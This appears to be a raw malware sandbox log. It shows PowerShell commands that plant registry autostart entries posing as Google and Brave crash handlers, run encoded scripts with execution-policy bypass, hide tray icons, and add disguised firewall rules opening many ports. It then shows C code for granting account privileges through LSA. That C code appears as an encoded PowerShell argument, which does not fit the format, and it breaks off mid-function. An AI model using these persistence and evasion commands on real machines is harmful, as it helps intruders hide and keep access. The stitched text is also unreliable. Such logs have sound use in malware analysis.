 N e w - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " G o o g l e C r a s h H a n d l e r "   - V a l u e   " $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r . e x e "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " G o o g l e C r a s h H a n d l e r "   - V a l u e   " $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r . e x e "   - T y p e   S t r i n g   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " G o o g l e C r a s h H a n d l e r 6 4 "   - V a l u e   " $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r 6 4 . e x e "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " G o o g l e C r a s h H a n d l e r 6 4 "   - V a l u e   " $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r 6 4 . e x e "   - T y p e   S t r i n g   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " G o o g l e C r a s h H a n d l e r 6 4 "   - V a l u e   " $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r 6 4 . e x e "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " G o o g l e C r a s h H a n d l e r 6 4 "   - V a l u e   " $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r 6 4 . e x e "   - T y p e   S t r i n g   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " B r a v e C r a s h H a n d l e r 6 4 "   - V a l u e   " $ e n v : A P P D A T A \ B r a v e C r a s h H a n d l e r 6 4 . e x e "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " B r a v e C r a s h H a n d l e r 6 4 "   - V a l u e   " $ e n v : A P P D A T A \ B r a v e C r a s h H a n d l e r 6 4 . e x e "   - T y p e   S t r i n g   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " B r a v e C r a s h H a n d l e r 6 4 "   - V a l u e   " $ e n v : A P P D A T A \ B r a v e C r a s h H a n d l e r 6 4 . e x e "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " B r a v e C r a s h H a n d l e r 6 4 "   - V a l u e   " $ e n v : A P P D A T A \ B r a v e C r a s h H a n d l e r 6 4 . e x e "   - T y p e   S t r i n g   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " E m b m a k e "   - V a l u e   " $ e n v : U S E R P R O F I L E \ E m b m a k e . e x e "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " E m b m a k e "   - V a l u e   " $ e n v : U S E R P R O F I L E \ E m b m a k e . e x e "   - T y p e   S t r i n g   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " E m b m a k e "   - V a l u e   " $ e n v : U S E R P R O F I L E \ E m b m a k e . e x e "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " E m b m a k e "   - V a l u e   " $ e n v : U S E R P R O F I L E \ E m b m a k e . e x e "   - T y p e   S t r i n g   - F o r c e 
 
 N e w - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " E m b e d i t "   - V a l u e   " $ e n v : U S E R P R O F I L E \ E m b e d i t . e x e "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " E m b e d i t "   - V a l u e   " $ e n v : U S E R P R O F I L E \ E m b e d i t . e x e "   - T y p e   S t r i n g   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " E m b e d i t "   - V a l u e   " $ e n v : U S E R P R O F I L E \ E m b e d i t . e x e "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   " H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   " E m b e d i t "   - V a l u e   " $ e n v : U S E R P R O F I L E \ E m b e d i t . e x e "   - T y p e   S t r i n g   - F o r c e 
                                                                                                                  4⤵
                                                                                                                    PID:4696
                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                      "C:\Windows\system32\chcp.com" 1252
                                                                                                                      5⤵
                                                                                                                        PID:5660
                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss88BD.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi88BA.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr88BB.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr88BC.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                                                    3⤵
                                                                                                                      PID:3812
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcACIAIAAtAE4AYQBtAGUAIAAiAEUAeABwAGwAbwByAGUAcgAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABFAHgAcABsAG8AcgBlAHIAIgAgAC0ATgBhAG0AZQAgACIATgBvAFQAcgBhAHkASQB0AGUAbQBzAEQAaQBzAHAAbABhAHkAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAEUAeABwAGwAbwByAGUAcgAiACAALQBOAGEAbQBlACAAIgBOAG8AVAByAGEAeQBJAHQAZQBtAHMARABpAHMAcABsAGEAeQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwAIgAgAC0ATgBhAG0AZQAgACIARQB4AHAAbABvAHIAZQByACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAEUAeABwAGwAbwByAGUAcgAiACAALQBOAGEAbQBlACAAIgBOAG8AVAByAGEAeQBJAHQAZQBtAHMARABpAHMAcABsAGEAeQAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwARQB4AHAAbABvAHIAZQByACIAIAAtAE4AYQBtAGUAIAAiAE4AbwBUAHIAYQB5AEkAdABlAG0AcwBEAGkAcwBwAGwAYQB5ACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQA=
                                                                                                                        4⤵
                                                                                                                          PID:4792
                                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                                            "C:\Windows\system32\chcp.com" 1252
                                                                                                                            5⤵
                                                                                                                              PID:1568
                                                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss8B14.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi8B11.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr8B12.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr8B13.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                                                          3⤵
                                                                                                                            PID:3152
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcACIAIAAtAE4AYQBtAGUAIAAiAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiAEgAdwBTAGMAaABNAG8AZABlACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABHAHIAYQBwAGgAaQBjAHMARAByAGkAdgBlAHIAcwAiACAALQBOAGEAbQBlACAAIgBIAHcAUwBjAGgATQBvAGQAZQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAyACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEQAYQB0AGEAIABDAG8AbABsAGUAYwB0AGkAbwBuAFwAIgAgAC0ATgBhAG0AZQAgAEEAbABsAG8AdwBUAGUAbABlAG0AZQB0AHIAeQAgAC0AVgBhAGwAdQBlACAAMAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABTAGUAYQByAGMAaAAiACAALQBOAGEAbQBlACAAQQBsAGwAbwB3AEMAbwByAHQAYQBuAGEAIAAtAFYAYQBsAHUAZQAgADAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBGAG8AcgBjAGUACgAKAEcAZQB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBQAGEAdABoACAAIgBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAE0AZQBtAG8AcgB5AEQAaQBhAGcAbgBvAHMAdABpAGMAXAAiACAAfAAgAEQAaQBzAGEAYgBsAGUALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAAoARABpAHMAYQBiAGwAZQAtAE0ATQBBAGcAZQBuAHQAIAAtAG0AYwAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIATgBlAHQAdwBvAHIAawAgAEQAaQBzAGMAbwB2AGUAcgB5ACAAUwBlAHIAdgBpAGMAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAE4AZQB0AHcAbwByAGsAIABEAGkAcwBjAG8AdgBlAHIAeQAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARwByAG8AdQBwACAAIgBOAGUAdAB3AG8AcgBrACAARABpAHMAYwBvAHYAZQByAHkAIABTAGUAcgB2AGkAYwBlACIAIAAtAEwAbwBjAGEAbABQAG8AcgB0ACAAOAAwACwAIAA0ADQAMwAsACAAMgAwADIAMAAsACAAMgAyADIAMgAsACAAMwAxADAAMAAsACAAMwAzADMAMwAsACAANAAwADQAMAAsACAANAA0ADQANAAsACAANAA0ADQAOQAsACAANgAwADYAMAAsACAAOAAwADgAMAAsACAAOAA4ADgAOAAsACAAOQAyADAAMAAsACAAMQAwADEAMgA4ACwAIAAxADAANgAwADAALAAgADEAMAA2ADQAMwAsACAAMQAyADAAMgAwACwAIAAxADgAOAA4ADgALAAgADEAOAAxADkAMgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAFAAcgBvAHQAbwBjAG8AbAAgAFQAQwBQACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBOAGUAdAB3AG8AcgBrACAARABpAHMAYwBvAHYAZQByAHkAIABDAG8AbgB0AHIAbwBsACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIATgBlAHQAdwBvAHIAawAgAEQAaQBzAGMAbwB2AGUAcgB5ACAAQwBvAG4AdAByAG8AbAAiACAALQBHAHIAbwB1AHAAIAAiAE4AZQB0AHcAbwByAGsAIABEAGkAcwBjAG8AdgBlAHIAeQAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ATABvAGMAYQBsAFAAbwByAHQAIAA4ADAALAAgADQANAAzACwAIAAyADAAMgAwACwAIAAyADIAMgAyACwAIAAzADEAMAAwACwAIAAzADMAMwAzACwAIAA0ADAANAAwACwAIAA0ADQANAA0ACwAIAA0ADQANAA5ACwAIAA2ADAANgAwACwAIAA4ADAAOAAwACwAIAA4ADgAOAA4ACwAIAA5ADIAMAAwACwAIAAxADAAMQAyADgALAAgADEAMAA2ADAAMAAsACAAMQAwADYANAAzACwAIAAxADIAMAAyADAALAAgADEAOAA4ADgAOAAsACAAMQA4ADEAOQAyACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBQAHIAbwB0AG8AYwBvAGwAIABUAEMAUAAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBSAG8AdQB0AGUAcgBXAGUAYgAgAFAAYQBjAGsAYQBnAGUAIABTAGUAcgB2AGkAYwBlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAUgBvAHUAdABlAHIAVwBlAGIAIABQAGEAYwBrAGEAZwBlACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFIAbwB1AHQAZQByAFcAZQBiACAAUABhAGMAawBhAGcAZQAgAFMAZQByAHYAaQBjAGUAIgAgAC0ATABvAGMAYQBsAFAAbwByAHQAIAA4ADAALAAgADQANAAzACwAIAAyADAAMgAwACwAIAAyADIAMgAyACwAIAAzADEAMAAwACwAIAAzADMAMwAzACwAIAA0ADAANAAwACwAIAA0ADQANAA0ACwAIAA0ADQANAA5ACwAIAA2ADAANgAwACwAIAA4ADAAOAAwACwAIAA4ADgAOAA4ACwAIAA5ADIAMAAwACwAIAAxADAAMQAyADgALAAgADEAMAA2ADAAMAAsACAAMQAwADYANAAzACwAIAAxADIAMAAyADAALAAgADEAOAA4ADgAOAAsACAAMQA4ADEAOQAyACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AUAByAG8AdABvAGMAbwBsACAAVQBEAFAAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFIAbwB1AHQAZQByAFcAZQBiACAAUABhAGMAawBhAGcAZQAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBSAG8AdQB0AGUAcgBXAGUAYgAgAFAAYQBjAGsAYQBnAGUAIABDAG8AbgB0AHIAbwBsACIAIAAtAEcAcgBvAHUAcAAgACIAUgBvAHUAdABlAHIAVwBlAGIAIABQAGEAYwBrAGEAZwBlACAAQwBvAG4AdAByAG8AbAAiACAALQBMAG8AYwBhAGwAUABvAHIAdAAgADgAMAAsACAANAA0ADMALAAgADIAMAAyADAALAAgADIAMgAyADIALAAgADMAMQAwADAALAAgADMAMwAzADMALAAgADQAMAA0ADAALAAgADQANAA0ADQALAAgADQANAA0ADkALAAgADYAMAA2ADAALAAgADgAMAA4ADAALAAgADgAOAA4ADgALAAgADkAMgAwADAALAAgADEAMAAxADIAOAAsACAAMQAwADYAMAAwACwAIAAxADAANgA0ADMALAAgADEAMgAwADIAMAAsACAAMQA4ADgAOAA4ACwAIAAxADgAMQA5ADIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAFAAcgBvAHQAbwBjAG8AbAAgAFUARABQACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUA
                                                                                                                              4⤵
                                                                                                                                PID:2768
                                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                                  "C:\Windows\system32\chcp.com" 1252
                                                                                                                                  5⤵
                                                                                                                                    PID:2392
                                                                                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss91DF.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi91DC.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr91DD.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr91DE.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                                                                3⤵
                                                                                                                                  PID:5428
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc c h c p   1 2 5 2 
 $ P r o g r e s s P r e f e r e n c e   =   ' S i l e n t l y C o n t i n u e ' 
 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   C u r r e n t U s e r   B y p a s s   - F o r c e 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   L o c a l M a c h i n e   B y p a s s   - F o r c e 
 
 # d e f i n e   U N I C O D E 
 # d e f i n e   _ U N I C O D E 
 
 # i n c l u d e   < w i n d o w s . h > 
 # i n c l u d e   < n t s e c a p i . h > 
 # i n c l u d e   < n t s t a t u s . h > 
 # i n c l u d e   < S d d l . h > 
 
 v o i d   I n i t L s a S t r i n g ( P L S A _ U N I C O D E _ S T R I N G   L s a S t r i n g ,   L P W S T R   S t r i n g ) 
 { 
         D W O R D   S t r i n g L e n g t h ; 
 
         i f   ( S t r i n g   = =   N U L L )   { 
                 L s a S t r i n g - > B u f f e r   =   N U L L ; 
                 L s a S t r i n g - > L e n g t h   =   0 ; 
                 L s a S t r i n g - > M a x i m u m L e n g t h   =   0 ; 
                 r e t u r n ; 
         } 
 
         S t r i n g L e n g t h   =   w c s l e n ( S t r i n g ) ; 
         L s a S t r i n g - > B u f f e r   =   S t r i n g ; 
         L s a S t r i n g - > L e n g t h   =   ( U S H O R T ) S t r i n g L e n g t h   *   s i z e o f ( W C H A R ) ; 
         L s a S t r i n g - > M a x i m u m L e n g t h   =   ( U S H O R T ) ( S t r i n g L e n g t h   +   1 )   *   s i z e o f ( W C H A R ) ; 
 } 
 
 N T S T A T U S   O p e n P o l i c y ( L P W S T R   S e r v e r N a m e ,   D W O R D   D e s i r e d A c c e s s ,   P L S A _ H A N D L E   P o l i c y H a n d l e ) 
 { 
         L S A _ O B J E C T _ A T T R I B U T E S   O b j e c t A t t r i b u t e s ; 
         L S A _ U N I C O D E _ S T R I N G   S e r v e r S t r i n g ; 
         P L S A _ U N I C O D E _ S T R I N G   S e r v e r   =   N U L L ; 
 
         Z e r o M e m o r y ( & O b j e c t A t t r i b u t e s ,   s i z e o f ( O b j e c t A t t r i b u t e s ) ) ; 
 
         i f   ( S e r v e r N a m e   ! =   N U L L )   { 
                 I n i t L s a S t r i n g ( & S e r v e r S t r i n g ,   S e r v e r N a m e ) ; 
                 S e r v e r   =   & S e r v e r S t r i n g ; 
         } 
 
         r e t u r n   L s a O p e n P o l i c y ( 
                 S e r v e r , 
                 & O b j e c t A t t r i b u t e s , 
                 D e s i r e d A c c e s s , 
                 P o l i c y H a n d l e 
         ) ; 
 } 
 
 N T S T A T U S   S e t P r i v i l e g e O n A c c o u n t ( L S A _ H A N D L E   P o l i c y H a n d l e ,   P S I D   A c c o u n t S i d ,   L P W S T R   P r i v i l e g e N a m e ,   B O O L   b E n a b l e ) 
 { 
         L S A _ U N I C O D E _ S T R I N G   P r i v i l e g e S t r i n g ; 
 
         I n i t L s a S t r i n g ( & P r i v i l e g e S t r i n g ,   P r i v i l e g e N a m e ) ; 
 
         i f   ( b E n a b l e )   { 
                 r e t u r n   L s a A d d A c c o u n t R i g h t s ( 
                         P o l i c y H a n d l e , 
                         A c c o u n t S i d , 
                         & P r i v i l e g e S t r i n g , 
                         1 
                 ) ; 
         } 
         e l s e   { 
                 r e t u r n   L s a R e m o v e A c c o u n t R i g h t s ( 
                         P o l i c y H a n d l e , 
                         A c c o u n t S i d , 
                         F A L S E , 
                         & P r i v i l e g e S t r i n g , 
                         1 
                 ) ; 
         } 
 } 
 
 v o i d   m a i n ( ) 
 { 
         H A N D L E   h T o k e n   =   N U L L ; 
 
         i f   ( ! O p e n P r o c e s s T o k e n ( G e t C u r r e n t P r o c e s s ( ) ,   T O K E N _ Q U E R Y ,   & h T o k e n ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " O p e n P r o c e s s T o k e n   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   G e t L a s t E r r o r ( ) ) ; 
                 r e t u r n   - 1 ; 
         } 
 
         D W O R D   d w B u f f e r S i z e   =   0 ; 
 
         i f   ( ! G e t T o k e n I n f o r m a t i o n ( h T o k e n ,   T o k e n U s e r ,   N U L L ,   0 ,   & d w B u f f e r S i z e )   & & 
                 ( G e t L a s t E r r o r ( )   ! =   E R R O R _ I N S U F F I C I E N T _ B U F F E R ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " G e t T o k e n I n f o r m a t i o n   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   G e t L a s t E r r o r ( ) ) ; 
 
                 C l o s e H a n d l e ( h T o k e n ) ; 
                 h T o k e n   =   N U L L ; 
 
                 r e t u r n   - 1 ; 
         } 
 
         P T O K E N _ U S E R   p T o k e n U s e r   =   ( P T O K E N _ U S E R )   m a l l o c ( d w B u f f e r S i z e ) ; 
 
         i f   ( ! G e t T o k e n I n f o r m a t i o n ( 
                 h T o k e n , 
                 T o k e n U s e r , 
                 p T o k e n U s e r , 
                 d w B u f f e r S i z e , 
                 & d w B u f f e r S i z e ) ) 
         { 
